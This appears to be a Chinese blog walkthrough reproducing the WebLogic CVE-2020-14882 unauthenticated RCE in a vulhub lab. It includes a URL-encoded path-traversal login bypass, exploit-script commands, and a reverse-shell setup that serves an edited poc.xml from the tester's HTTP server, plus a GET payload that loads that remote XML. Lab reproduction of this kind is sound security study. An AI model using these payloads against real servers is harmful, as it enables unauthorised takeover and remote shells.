Weblogic CVE-2020-14882 未授权远程命令执行漏洞

漏洞简介

Oracle WebLogic Server 未授权远程命令执行漏洞

原理

  • 未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码

环境搭建

  • 这边也特意出了一篇vulhub环境搭建,还不太会环境搭建的小伙伴可以看这里哟;

漏洞复现

  • 访问your-IP:7001,页面出现404说明环境搭建成功;

在这里插入图片描述- 继续访问your-IP:7001/console,出现一个登录页面;

在这里插入图片描述

  • 由于不知道用户名和密码无法进入后台,但这里可以利用绕过验证漏洞,可以绕过登录;

      your-IP:端口/console/images/%252E%252E%252Fconsole.portal
    

在这里插入图片描述
访问成功进入了后台, 但这里后台权限过低无法执行其他操作;

利用方式一

python3 CVE-2020-14882_ALL.py -u http://your-IP:7001 -c "whoami"

在这里插入图片描述

  • 修改漏洞利用工具里的poc.xml,将IP和监听端口修改为自己的;

在这里插入图片描述

  • 开启服务端http服务,默认是8000端口,使其可以访问到poc.xml;(注:命令执行目录)
python3 -m http.server

在这里插入图片描述

  • 宿主机访问your-IP:8000/poc.xml,成功访问;

在这里插入图片描述

  • 服务端也成功返回状态;

在这里插入图片描述

  • 新开一个窗口,监听poc.xml监听端口,这里以1234为例;

在这里插入图片描述

  • 再新开一个窗口,进入到漏洞利用工具目录下,执行反弹shell命令,成功反弹shell;
python3 CVE-2020-14882_ALL.py -u http://your-IP:7001 -x http://your-IP:8000/poc.xml

在这里插入图片描述

利用方式二 (未成功)

  • 看其他大佬的方法,尝试在浏览器使用get请求也可反弹shell;

Payload

http://your-IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://your-IP/poc.xml")

在这里插入图片描述

  • 但是尝试了几次都失败了,我也不知道啥子原因,如果有成功的大佬也希望可以交流一下,我学习学习;

在这里插入图片描述
以上内容就是Oracle WebLogic Server 未授权远程命令执行漏洞复现过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值